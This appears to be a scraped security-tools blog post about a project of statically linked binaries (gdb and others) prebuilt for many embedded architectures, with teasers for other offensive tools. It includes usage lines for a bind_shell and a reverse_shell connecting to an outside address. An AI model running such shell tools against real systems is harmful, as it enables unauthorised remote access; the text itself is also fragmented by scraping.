Prebuilt binaries for multiple architeture (arm, armeb, aarch64, aarch64_be, mips, mips1, mipsel, mipsel1, mips64, mips64el, powerpc, powerpc64, powerpc64le, riscv64, i586, x86_64)
All binaries are statically linked and stripped.
Please go to the Release page for downloads. *archName*_tools.zip
contains tools’ binary (see Tools Section) for that specific arch, and allinone.zip
contains all of it.
Or download single file directly from bin
branch.
The source code and scripts can be
found in the branch.
buildroot 2014.11
because they remove support after that version.buildroot 2019.11.1
output/host
, others are from make sdk
)gdb 7.12.1
, others are 8.3.1
):(
)./bind_shell
will listen on port 3343 and ./bind_shell 6666
will listen on 6666../reverse_shell 1.1.1.1 12345
will connect to 1.1.1.1:12345; ./reverse_shell 1.1.1.1
will connect to 1.1.1.1:3343The config file for buildroot and github actions’ workflow file are in the src
branch.
SeamlessPass is a specialized tool designed to leverage on-premises Active Directory Kerberos tickets to obtain…
PPLBlade is a powerful Protected Process Dumper designed to capture memory from target processes, hide…
HikPwn: Comprehensive Guide to Scanning Hikvision Devices for Vulnerabilities If you’re searching for an efficient…
What Are Bash Comments? Comments in Bash scripts, are notes in your code that the…
When you write a Bash script in Linux, you want it to run correctly every…
Introduction If you’re new to Bash scripting, one of the first skills you’ll need is…